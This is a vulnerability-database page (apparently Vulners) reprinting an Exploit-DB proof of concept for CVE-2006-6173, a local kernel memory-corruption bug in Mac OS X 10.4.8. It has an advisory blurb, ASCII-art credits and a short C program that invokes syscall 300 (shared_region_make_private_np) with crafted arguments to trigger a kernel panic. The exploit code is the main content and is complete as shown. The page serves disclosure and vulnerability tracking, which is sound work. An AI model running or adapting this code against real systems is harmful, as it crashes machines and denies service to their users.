Lucene search
+L

Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption

🗓️ 29 Nov 2006 00:00:00Reported by LMHType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

Apple Mac OSX 10.4.x Kernel Function Local Memory Corruptio

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Mac OS X < 10.4.9 Multiple Vulnerabilities (Security Update 2007-003)
13 Mar 200700:00
nessus
Tenable Nessus
Mac OS X < 10.4.9 Multiple Vulnerabilities (Security Update 2007-003)
13 Mar 200700:00
nessus
CVE
CVE-2006-6173
30 Nov 200616:00
cve
Cvelist
CVE-2006-6173
30 Nov 200616:00
cvelist
EUVD
EUVD-2006-6156
7 Oct 202500:30
euvd
NVD
CVE-2006-6173
30 Nov 200616:28
nvd
/*
source: https://www.securityfocus.com/bid/21349/info

Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call.

Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed.

Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected.
*/


/*
 * Copyright 2006 (c) LMH <[email protected]>.
 * All Rights Reserved.
 * ----
 *               .---. .---.
 *              :     : o   :    me want cookie and clues! L0W LEVA! - A
J. H
 *          _..-:   o :     :-.._    /
 *      .-''  '  `---' `---' "   ``-.
 *    .'   "   '  "  .    "  . '  "  `.
 *   :   '.---.,,.,...,.,.,.,..---.  ' ;
 *   `. " `.                     .' " .' kudos to ilja, kevin and icer.
 *    `.  '`.                   .' ' .'           "proof of concept" for
 *     `.    `-._           _.-' "  .'  .-------.       MOKB-28-11-2006.
 *       `. "    '"--...--"'  . ' .'  .'  · o   ·`.
 *       .'`-._'    " .     " _.-'`. :  C o C o A :
 *     .'      ```--.....--'''    ' `:_ o      o  :
 *   .'    "     '         "     "   ; `.;";";"; _'
 *  ;         '       "       '     . ; .' ; ; ;
 * ;     '         '       '   "    .'      .-'
 * '  "     "   '      "           "    _.-'
 */

#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>

int main() {
		/* shared_region_make_private_np = 300 (xnu-792.6.70),
3rd arg unused */
        syscall(300, 0x8000000, 0xdeadface, 0xffffffff);
        return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01255
19